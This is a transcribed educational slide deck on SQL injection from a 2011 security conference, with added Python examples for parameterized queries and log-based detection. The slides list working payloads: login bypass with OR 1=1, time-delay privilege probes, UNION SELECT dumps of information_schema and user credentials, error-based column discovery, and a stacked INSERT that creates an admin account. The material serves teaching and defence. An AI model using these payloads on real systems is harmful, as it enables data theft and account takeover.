How did i steal your database CSCamp2011

Post on 08-Jul-2015



How Did I Steal Your Database

Mostafa Siraj

Application Security Expert

DISCLAIMER

Hacking websites is ILLEGAL

This presentation is meant for educational purposes ONLY

Only use this stuff on YOUR website and YOUR account

Nearly all applications rely on a Datastore

What is a Database

• A Collection of Tables (Users, Orders, Countries,..etc)

• The tables are a collection of columns/rows, e.g. a Users table:

  Username     Password     First_Name  Last_Name  Email                    IsAdmin
  Elprince     Elprince123  Ahmed       ElMasry    elprince123@example.com  Yes
  ElnegmTamer  Password123  Tamer       Tamer      Tamer123@example.com     No
  ……           …..          ……          ……         ……                       ……

What is SQL

• A query language that allows interacting with the database

• SQL can

– Retrieve data from the database

– Insert new records in the database

– Delete records from the database

– Update records in the database

SQL Queries

• To get all data about Username elprince:

SELECT Username, Password, First_Name, Last_Name, Email
FROM Users
WHERE Username='elprince'

• Gives a result:

Elprince Elprince123 Ahmed ElMasry elprince123@example.com

FACT

• Amongst Codd's rules for a Relational Database:

– Metadata must be stored in the database just as regular data is

SQL Injection

• A technique where an attacker creates or alters existing SQL commands in order to:

– Expose hidden data (e.g. steal all the records from the tables)

– Override the data (e.g. Administrators password)

– Execute dangerous system level commands on the database host

SQL Injection Login Example

SELECT * FROM Users WHERE Username='username' AND Password='password'

• If the user entered Elprince, Elprince123 the query will be

SELECT * FROM Users WHERE Username='Elprince' AND Password='Elprince123'

SQL Injection Example (cont.)

• Suppose the user entered ' OR 1=1--, 123; the query will be

SELECT * FROM Users WHERE
Username='' OR 1=1--' AND Password='123'

• -- comments out everything after it, so the effective query is

SELECT * FROM Users WHERE
Username='' OR 1=1--

This is not enough

• You can enhance the injection to login with the administrator account

Enter ' or 1=1 ORDER BY 1--, abc and the query will be

SELECT * FROM Users WHERE
Username='' OR 1=1 ORDER BY 1--' AND Password='abc'
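The login query above, built by pasting the submitted username and password into the SQL text, is reproduced here beside the parameterized form that closes the hole. This is an added example written for this page, not code from the talk; it uses Python's sqlite3 module and an in-memory copy of the Users table from the slides (the rows are constructed sample data). The same ' OR 1=1-- input returns every row through the concatenated query and no rows through the placeholder query, because the driver passes placeholder values as data rather than as SQL grammar.

```python
import sqlite3

# Constructed sample rows modelled on the Users table in the slides.
SAMPLE_USERS = [
    ("Elprince", "Elprince123", "Ahmed", "ElMasry", "elprince123@example.com", 1),
    ("ElnegmTamer", "Password123", "Tamer", "Tamer", "Tamer123@example.com", 0),
]


def make_db():
    """Create an in-memory SQLite database holding the slides' Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (Username TEXT, Password TEXT, First_Name TEXT,"
        " Last_Name TEXT, Email TEXT, IsAdmin INTEGER)"
    )
    conn.executemany("INSERT INTO Users VALUES (?,?,?,?,?,?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern from the slides: user input concatenated into the SQL text.
    A quote in the input closes the string literal and -- comments out the
    rest of the WHERE clause, so the password check never runs."""
    sql = ("SELECT Username, IsAdmin FROM Users WHERE Username='" + username
           + "' AND Password='" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Same query with placeholders: the values travel separately from the
    statement, so quotes and comment markers are compared as plain text."""
    sql = "SELECT Username, IsAdmin FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    for user, pw in [("Elprince", "Elprince123"), ("' OR 1=1--", "123")]:
        print(repr(user), "vulnerable:", login_vulnerable(conn, user, pw),
              "| parameterized:", login_parameterized(conn, user, pw))
```

Storing passwords in clear text, as the slides' table does for illustration, is a separate problem from injection; the parameterized query fixes only the injection.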

Finding SQL Injection Bugs

• Submit single quotation mark and observe the result

• Submit two single quotations and observe the result

Finding SQL Injection Bugs

• For multistate processes, complete all the states before observing the results

• For search fields try using the wildcard character %

Finding SQL Injection Bugs

• For numeric data, if the original value was 2 try submitting

1+1 or 3-1

• If successful try using SQL-specific keywords, e.g.

67-ASCII('A')

• If single quotes are filtered try

51-ASCII(1) (note: ASCII(1)=49)

Identify the database engine

• The error messages will let us know the DB engine

• We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)

Identify the database engine

• Use engine-specific characters or commands, e.g. string concatenation differs between DB engines:

  Oracle:                '||'FOO
  Microsoft SQL Server:  '+'FOO
  MySQL:                 ' 'FOO   (note the space between the two quotes)

Identify User privileges

• ' and 1 in (SELECT user)--

• '; IF user='admin' WAITFOR DELAY '0:0:10'--

Injection in Search Fields


Entering Normal Input

Search Results

Trying Single Quote

I receive this error

Error states that it’s

Suppose I still don't know the DB engine. Is it Microsoft SQL Server?

Note: string concatenation in Microsoft SQL Server is +

I'm getting an error, so it's not Microsoft SQL Server

Is it Oracle?

Note: string concatenation in Oracle is ||

Different error, still not Oracle

Is it MySQL?

Note: string concatenation in MySQL is a blank space

It's MySQL

The query in the backend is something like this

SELECT …,…,…,…,…

FROM ….

WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….

A possible location for my input

The Strategy

1. Get number of items after the SELECT statement

SELECT …,…,…,…,…

FROM ….

WHERE ….=…. AND ….!=….. OR …..>……

How many items are here

The Strategy

2. Identify the location of the STRINGS in the SELECT Statement

SELECT …,…,…,…,…

FROM ….

WHERE ….=…. AND ….!=….. OR …..>……

Which of those are strings

The Strategy

3. Get the Structure of the database

SELECT …,…,…,…,…

FROM ….

WHERE …. UNION

SELECT ….,TableNames,….,….,…

FROM DatabaseStructure --=…. AND ….!=….. OR …..>……

The Strategy

4. Get the data from the database

SELECT …,…,…,…,…

FROM ….

WHERE …. UNION

SELECT ….,Usernames,….,….,…

FROM Users --=…. AND ….!=….. OR …..>……

The Strategy

1. Get number of items after the SELECT statement

2. Identify the location of the STRINGS in the SELECT Statement

3. Get the Structure of the database

4. Get the data from the database

1. Get number of items after the SELECT statement

Error

Try another number

Result

Why are there fewer results?

Try another number

Error, it’s not 8

Let’s try 7

Result

How many columns do we have in the SELECT statement


2. Identify the location of the STRINGS in the SELECT Statement

1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#

Result

Get the Strings and the locations

1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#

Result


3. Get the Structure of the database

1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL FROM information_schema.tables#

Result


Next Queries

1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='USERS'#

1234') UNION SELECT NULL,NULL,NULL,username,password,NULL,NULL FROM users WHERE id<100#

…….

Continue till you get all the tables
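Every step of the hunt described on this page, from the lone single quote and the 1+1 arithmetic probe through the WAITFOR DELAY privilege check to the UNION SELECT NULL,... column-counting and information_schema enumeration, leaves a recognisable trace in the web server's access log. The following detection script is an added example written for this page (it is not from the talk): it parses constructed access-log lines in common log format, percent-decodes each query parameter once, scores the decoded values against indicators taken from the probes the slides show, and weights up a probe that drew a 5xx response, which is the same signal the slides use when looking for the bug. The parameter names (q, id), the set of numeric parameters and the weights are assumptions about a hypothetical application and should be tuned to the real one; a legitimate O'Brien search is included to show why a single quote alone is scored low.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (common log format). They are not from the talk;
# they only mimic the probes the slides walk through, plus one benign quote.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2015:10:00:01 +0200] "GET /search.php?q=laptop HTTP/1.1" 200 5120
10.0.0.5 - - [07/Jul/2015:10:00:09 +0200] "GET /search.php?q=%27 HTTP/1.1" 500 312
10.0.0.5 - - [07/Jul/2015:10:00:15 +0200] "GET /item.php?id=1%2B1 HTTP/1.1" 200 4096
10.0.0.5 - - [07/Jul/2015:10:00:21 +0200] "GET /item.php?id=67-ASCII%28%27A%27%29 HTTP/1.1" 200 4096
10.0.0.5 - - [07/Jul/2015:10:01:02 +0200] "GET /search.php?q=%27%3B+IF+user%3D%27admin%27+WAITFOR+DELAY+%270%3A0%3A10%27-- HTTP/1.1" 200 300
10.0.0.5 - - [07/Jul/2015:10:02:40 +0200] "GET /search.php?q=1234%27%29+UNION+SELECT+NULL%2CNULL%2CNULL%2Ctable_name%2CNULL%2CNULL%2CNULL+FROM+information_schema.tables%23 HTTP/1.1" 200 9000
10.0.0.7 - - [07/Jul/2015:10:03:00 +0200] "GET /search.php?q=O%27Brien HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameters this hypothetical application treats as integers (an assumption);
# an arithmetic expression arriving in one is the 1+1 / 3-1 probe from the slides.
NUMERIC_PARAMS = {"id"}
NUMERIC_ARITHMETIC = re.compile(r"^\d+\s*[+\-*/]\s*\d+$")

# (label, weight, pattern) applied to every decoded parameter value.
INDICATORS = [
    ("bare-quote",         1, re.compile(r"^'$")),                   # first probe in the slides
    ("sql-comment",        2, re.compile(r"--|#$")),
    ("boolean-tautology",  3, re.compile(r"\bOR\s+\d+\s*=\s*\d+", re.I)),
    ("ascii-arithmetic",   3, re.compile(r"\bASCII\s*\(", re.I)),
    ("version-probe",      3, re.compile(r"@@version", re.I)),
    ("stacked-statement",  2, re.compile(r";\s*(IF|INSERT|UPDATE|DELETE|DROP)\b", re.I)),
    ("time-delay",         4, re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("union-select",       4, re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("schema-enumeration", 4, re.compile(r"\binformation_schema\b", re.I)),
]


def score_request(line):
    """Parse one log line and return (ip, path, score, hits), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    score, hits = 0, []
    for name, value in parse_qsl(url.query, keep_blank_values=True):  # percent-decodes once
        for label, weight, pattern in INDICATORS:
            if pattern.search(value):
                score += weight
                hits.append(f"{name}:{label}")
        if name in NUMERIC_PARAMS and NUMERIC_ARITHMETIC.match(value):
            score += 3
            hits.append(f"{name}:arithmetic-in-numeric-param")
    # A probe that produced a server error is the same signal the slides use
    # when hunting for the bug, so weight it up.
    if hits and m.group("status").startswith("5"):
        score += 2
        hits.append("server-error-response")
    return m.group("ip"), url.path, score, hits


def suspicious_requests(log_text, threshold=3):
    """Return the scored requests at or above threshold, in log order."""
    results = []
    for line in log_text.splitlines():
        r = score_request(line)
        if r and r[2] >= threshold:
            results.append(r)
    return results


if __name__ == "__main__":
    for ip, path, score, hits in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path} score={score} {hits}")
```

The scoring is deliberately additive: a single quote alone (score 1) does not cross the threshold, a quote followed by a 500 does, and the UNION/information_schema requests score highest because they only appear once the earlier probes have succeeded. POST bodies are not in the access log, so the same indicators need to be applied at the application or WAF layer for form-based pages such as the login example.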


Injection with errors

Gives me an Error

Getting version

' and 1 in (SELECT @@version)--

Gives me this error

Getting Column names

I get this Error

Getting next column name

' group by login.firstname having 1=1--

I get this error

Again

' group by login.firstname, login.surname having 1=1--

Error reveals new column name

Again

' group by login.firstname, login.surname,login.username having 1=1--

New column name

Continue…

Continue…

Continue…

• After getting all of the columns I found a field called IsAdmin (that's my goal)

• Putting the following query creates an admin account on the application

'; INSERT INTO Login (username, pwd, IsAdmin, ……)
VALUES ('Administrator', '******', TRUE, …..)

Not all Injections generate errors

DEMO

SQLMap

You were a GREAT audience

Thank You

@mostafasiraj

Mostafa Siraj